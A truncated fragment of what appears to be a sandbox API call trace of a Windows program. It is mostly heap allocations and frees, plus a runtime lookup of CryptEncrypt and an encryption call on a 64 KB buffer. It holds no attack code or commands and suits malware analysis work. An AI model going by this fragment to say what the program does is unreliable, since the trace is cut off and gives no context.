RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0138.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0138.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0138.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0138.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0138.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0138.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2e90328 [0138.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0138.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90328 | out: hHeap=0x970000) returned 1 [0138.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0138.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0138.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0138.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0138.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0138.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0138.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0138.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0138.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0138.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0138.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0138.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0138.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0138.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0138.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0138.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0138.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0138.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0138.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0138.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0138.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0138.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0138.993] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0138.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0138.993] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xffed, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xfff0) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0138.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0138.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0138.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0138.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0138.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0138.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0138.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0138.997] CharLowerBuffW (in: lpsz="byte[65520]", cchLength=0xb | out: lpsz="byte[65520]") returned 0xb [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0138.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0138.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2e90328 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0138.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0138.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0138.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0138.999] RtlAllocateHeap 